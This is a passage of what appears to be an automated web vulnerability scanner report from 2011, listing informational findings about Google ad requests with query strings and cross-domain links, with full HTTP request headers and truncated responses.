<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPRWeb.com%26adT%3DPress%2BRelease%2BTemplates%26gl%3DUS&usg=AFQjCNFiTNCYKiwvS0BXGBykLX8TGZTh0g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.21. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...

22.22. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757147&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739163288&bpp=11&shv=r20110420&jsv=r20110415&correlator=1303739164172&frm=0&adk=1607234649&ga_vid=332023737.1303739165&ga_sid=1303739165&ga_hid=1647371635&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=36815001&fu=0&ifi=1&dtd=1342&xpc=elXzaM1u1f&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dsupermicro.com/CloudServerChassis%26adT%3D2.5%2526quot%253B%2BHDD%2BServer%26adU%3Dvulnerability.management.qualys.com%26adT%3DVulnerability%2BManagement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26gl%3DUS&usg=AFQjCNFpCuEJSWNoPv_4EJdAl1_HAAJEkg

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757147&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739163288&bpp=11&shv=r20110420&jsv=r20110415&correlator=1303739164172&frm=0&adk=1607234649&ga_vid=332023737.1303739165&ga_sid=1303739165&ga_hid=1647371635&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=36815001&fu=0&ifi=1&dtd=1342&xpc=elXzaM1u1f&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dsupermicro.com/CloudServerChassis%26adT%3D2.5%2526quot%253B%2BHDD%2BServer%26adU%3Dvulnerability.management.qualys.com%26adT%3DVulnerability%2BManagement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26gl%3DUS&usg=AFQjCNFpCuEJSWNoPv_4EJdAl1_HAAJEkg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.23. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758810&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740840638&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740840732&frm=0&adk=1607234649&ga_vid=583291703.1303740841&ga_sid=1303740841&ga_hid=96684719&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=177&xpc=h1TVqbQmCu&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Webmetrics.com%26adT%3DApache%2BMonitoring%26adU%3DManageEngine.com/EventLogAnalyzer%26adT%3Dproxy%2Bserver%2Blog%26adU%3Dwww.splunk.com/ITSearch%26adT%3DFree%2BLog%2BFile%2BAnalyzer%26gl%3DUS&usg=AFQjCNFdcLnzYw3uVzfB6d7Ul06hcfPw3g

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758810&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740840638&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740840732&frm=0&adk=1607234649&ga_vid=583291703.1303740841&ga_sid=1303740841&ga_hid=96684719&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=177&xpc=h1TVqbQmCu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13110

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Webmetrics.com%26adT%3DApache%2BMonitoring%26adU%3DManageEngine.com/EventLogAnalyzer%26adT%3Dproxy%2Bserver%2Blog%26adU%3Dwww.splunk.com/ITSearch%26adT%3DFree%2BLog%2BFile%2BAnalyzer%26gl%3DUS&usg=AFQjCNFdcLnzYw3uVzfB6d7Ul06hcfPw3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.24. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758225&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740262586&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740262682&frm=0&adk=1819763764&ga_vid=304831063.1303740263&ga_sid=1303740263&ga_hid=199340974&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=169&xpc=ZRywAON1Xo&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPrenupAgreement.RocketLawyer.com%26adT%3DFree%2BPrenuptial%2BAgreement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&usg=AFQjCNEtEtdonxR2g6hFKmGbMydw4xcj3g

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758225&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740262586&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740262682&frm=0&adk=1819763764&ga_vid=304831063.1303740263&ga_sid=1303740263&ga_hid=199340974&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=169&xpc=ZRywAON1Xo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPrenupAgreement.RocketLawyer.com%26adT%3DFree%2BPrenuptial%2BAgreement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&usg=AFQjCNEtEtdonxR2g6hFKmGbMydw4xcj3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.25. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=2240541906&w=160&lmt=1303759229&flash=10.2.154&url=http%3A%2F%2Fpogoda.webalta.ru%2F&dt=1303741229140&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741229174&frm=0&adk=618464972&ga_vid=2128179421.1303741229&ga_sid=1303741229&ga_hid=1489066141&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&fu=0&ifi=1&dtd=45&xpc=CrphvdTDRQ&p=http%3A//pogoda.webalta.ru

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pogoda.webalta.ru/%26hl%3Den%26client%3Dca-pub-1134822682510879%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.MichelinMan.com%26adT%3DWeather%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.consumer-classactions.com%26adT%3DGot%2Ba%2BData%2BBreach%2BEmail%253F%26gl%3DUS&usg=AFQjCNGoC4xgk7-X1pEoKp7smEywYGybIg

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=2240541906&w=160&lmt=1303759229&flash=10.2.154&url=http%3A%2F%2Fpogoda.webalta.ru%2F&dt=1303741229140&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741229174&frm=0&adk=618464972&ga_vid=2128179421.1303741229&ga_sid=1303741229&ga_hid=1489066141&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&fu=0&ifi=1&dtd=45&xpc=CrphvdTDRQ&p=http%3A//pogoda.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pogoda.webalta.ru/%26hl%3Den%26client%3Dca-pub-1134822682510879%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.MichelinMan.com%26adT%3DWeather%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.consumer-classactions.com%26adT%3DGot%2Ba%2BData%2BBreach%2BEmail%253F%26gl%3DUS&usg=AFQjCNGoC4xgk7-X1pEoKp7smEywYGybIg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

22.26. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303759971&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742686562&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303742686588&frm=0&adk=1607234649&ga_vid=1444597712.1303742687&ga_sid=1303742687&ga_hid=874676743&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=60&xpc=dQOO6ofOJ6&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.DailyTradeAlert.com%26adT%3D9%2BBest%2BStocks%2Bto%2BOwn%2BNow%26adU%3Dwww.obs-innovation.com%26adT%3DFree%2BDocument%2BWhite%2BPaper%26gl%3DUS&usg=AFQjCNHr3R-N75W0VvPU4CVjLvuDguH5Hg

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303759971&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742686562&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303742686588&frm=0&adk=1607234649&ga_vid=1444597712.1303742687&ga_sid=1303742687&ga_hid=874676743&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=60&xpc=dQOO6ofOJ6&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
